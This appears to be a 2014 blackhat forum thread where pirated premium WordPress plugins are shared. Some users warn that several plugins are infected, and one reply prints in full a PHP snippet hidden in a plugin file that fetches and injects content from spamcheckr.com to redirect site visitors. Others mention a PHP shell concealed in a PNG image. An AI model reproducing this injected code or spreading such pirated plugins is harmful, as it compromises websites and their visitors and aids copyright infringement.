Best Blackhat Forum

Full Version: [HUGE COLLECTION] WORDPRESS PLUGINS - DAILY UPDATE
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14
(04-20-2014 02:45 AM)Kleaklea Wrote: [ -> ]do you have popup domination?
Oh. Sorry. I thought it's wordpress theme. My mistake. Will move it to wordpress plugin list. :(
You are really awesome for compiling this list. I can't give you enough +rep lol

Also, I would like to report links that are not functioning as I find them.

Arqam v1.1.3 – Retina Responsive WP Social Counter Plugin - both links are broken, the files have been removed. I will post more as I discover them.

Thanks a bunch!
Hi,

Thanks for this download list.

Could you please update ajax store locator plugins? No 11 in your list.

Thanks again.

BR,
VictorLew
"Restrict Content Pro" Plugin is very old, please upload a new version if u have....

Thanx in advance
Thanks.. Its an awesome list. Cool

But I found one of the plugin contains malicious code which will redirect users to a youtube video. Angry
Plugin name is "Easy Social Share Buttons".

Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"

Remove
Code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc00_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc00_chesk');}} ?>


Please update the plugin and reupload.
(04-22-2014 03:05 PM)prohacker1324 Wrote: [ -> ]Thanks.. Its an awesome list. Cool

But I found one of the plugin contains malicious code which will redirect users to a youtube video. Angry
Plugin name is "Easy Social Share Buttons".

Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"

Remove


Please update the plugin and reupload.
Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(
Cool.. I found 1 more... Lol
Quote:base64

Plugin : ninja-popups v2.4 - Theme123.Net

Infected file : ninja-popups v2.4 - Theme123.Net/img/social.png

Open with a text editor, then you can find the crap php code in that image file.

Now it serious.. its definitely an exploit shell. If anybody has downloaded and installed this plugin, highly recommended to change the server password and ssh keys before the attacker gets access. I know its too late. Confused

Bro, are you downloading and uploading the files from theme123.Net ? Same plugin I downloaded from theme123.Net for testing and still I can see the exploit file there. Anyway atleast check before you upload.
(04-23-2014 07:30 PM)bhwseo.com Wrote: [ -> ]
(04-22-2014 03:05 PM)prohacker1324 Wrote: [ -> ]Thanks.. Its an awesome list. Cool

But I found one of the plugin contains malicious code which will redirect users to a youtube video. Angry
Plugin name is "Easy Social Share Buttons".

Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"

Remove


Please update the plugin and reupload.
Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(
also in MyMail

Redirecting code is in a php file 'wc.class.php'.
search for "http://spamcheckr.com/l.php"

Delete
The link for WP all import V 3.3 is down, could you please upload again.

Thanks.
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Reference URL's